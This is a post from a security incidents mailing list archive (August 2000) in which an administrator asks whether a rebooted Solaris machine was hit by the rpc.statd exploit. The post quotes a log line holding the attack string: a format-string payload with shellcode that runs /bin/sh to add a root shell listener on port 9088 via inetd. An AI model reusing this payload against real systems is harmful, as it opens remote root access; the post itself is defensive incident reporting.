Security Incidents mailing list archives
A statd exploit?
From: Randy Nethers <rnethers () MAIL GEOTOUCH COM>
Date: Tue, 15 Aug 2000 12:35:00 -0700
Yesterday, a friend of mine from a local university asked me to take a look at a machine (an Ultra 2 w/Solaris 2.6) which had rebooted itself yesterday morning (Aug 14th) for no apparent reason. After poking around, I could find nothing of interest, except two things. First I found in /var/adm/messages.0 the following line: Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create "/var/statmon/sm/%0 8x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055 x%n%012x%n%0192x%nK^v ^( ^ ^. #^1 F'F* FF+, NV1@/bin/sh -c echo "9088 stream tc p nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;" Also, this single entry in the messages file is the only message in any of the log files from Aug 12, which I find strange. (There are lots of messages in /var/log/syslog from the Saturday before, but none for Aug 12, for instance regarding emails going to and from the machine.) The reboot occured at about 9:30 am, just before people at the office where the machine is located started using it. The machine has Oracle on it. I was wondering if this might have anything to with the rpc.statd exploit discussed earlier on this list where a user found a file called /tmp/bob. I looked, but obviously, with the machine having been rebooted, there would be nothing in /tmp. Anybody have any ideas? Thanks, Randy Nethers
Current thread:
- A statd exploit? Randy Nethers (Aug 18)
- Re: A statd exploit? Andreas Östling (Aug 18)
- Re: A statd exploit? Ejovi Nuwere (Aug 18)